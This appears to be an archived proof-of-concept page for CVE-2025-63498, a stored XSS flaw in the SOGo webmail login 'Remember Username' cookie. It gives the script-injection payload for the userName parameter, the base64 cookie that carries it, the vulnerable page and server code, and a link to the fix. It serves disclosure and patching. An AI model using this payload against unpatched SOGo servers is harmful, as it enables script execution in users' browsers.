Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-63498 PoC — SOGo 安全漏洞

Source
Associated Vulnerability
Title:SOGo 安全漏洞 (CVE-2025-63498)
Description:SOGo是Alinto开源的一个非常快速且可扩展的现代协作套件。它提供日历、地址簿管理和功能齐全的 Webmail 客户端以及资源共享和权限处理。 SOGo 5.12.3版本存在安全漏洞,该漏洞源于userName参数存在跨站脚本。
Readme
                                            Stored XSS in cookie Alinto/SOGo 

Researchers: Daniil Khomichenok, Alexander Klimenko

Affected Versions < 5.12.3

Date: 01.10.2025

 **********************************************************************************************
 
When the **"Remember Username"** feature is enabled, a base64-encoded field is added to the browser cookie. 

This value is obtained from the **"userName"** parameter in the **POST** request to the **/SOGo/connect** endpoint.

Server response contains b64 encoded XSS payload with set cookie:

**_Set-Cookie:_ SOGoLogin=dGVzdDIyMkBxYXRlc3Qub2YuYnk8L3NjcmlwdD48c2NyaXB0PmFsZXJ0KCcxMjMnKTwvc2NyaXB0Pg%3D%3D; expires=Sun, 02-Nov-2025 09:58:23 GMT;**

Adding the following value to the POST request for the **"userName"** parameter:

<sub> test222@victim.com</script><script>alert('123')</script> </sub>

which contains a **JavaScript injection** that is **_executed_** when the user revisits the authentication page and is stored in the **_"SOGoLogin"_ cookie in the user's browser**.


Code of Auth page, which contains injection:

    <script type="text/javascript">
    var cookieUsername = "test222@victim.com</script><script>alert('123')</script>";
    var language = 'English';
    var loginHint = ''
    </script>

Code of login remember set-cookie which accepts XSS injections as a paramteter value:

    if (rememberLogin)
      [response addCookie: [self _cookieWithUsername: [params objectForKey: @"userName"]]];
      else
      [response addCookie: [self _cookieWithUsername: nil]];


Fix: https://github.com/Alinto/sogo/commit/9e20190fad1a437f7e1307f0adcfe19a8d45184c
File Snapshot

[4.0K] /data/pocs/4cc69b409fd2d8d0115c67e88af76d094fea22b9 └── [1.6K] README.md 1 directory, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.